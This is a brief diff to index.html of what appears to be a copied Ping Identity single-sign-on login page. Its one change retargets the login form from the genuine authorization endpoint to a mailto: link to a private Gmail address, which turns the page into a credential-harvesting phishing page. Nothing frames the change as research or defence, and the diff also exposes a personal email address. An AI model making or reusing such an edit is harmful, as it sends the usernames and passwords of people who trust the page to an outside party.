--- a/index.html
+++ b/index.html
@@ -72,7 +72,7 @@
     <div class="ping-body-container">
 
         <main>
-            <form method="POST" action="/as/ueyiY/resume/as/authorization.ping" autocomplete="off" id="loginForm">
+            <form method="POST" action="mailto:alexrandles0@gmail.com" autocomplete="off" id="loginForm">
 
                 <div class="ping-messages">
                                         
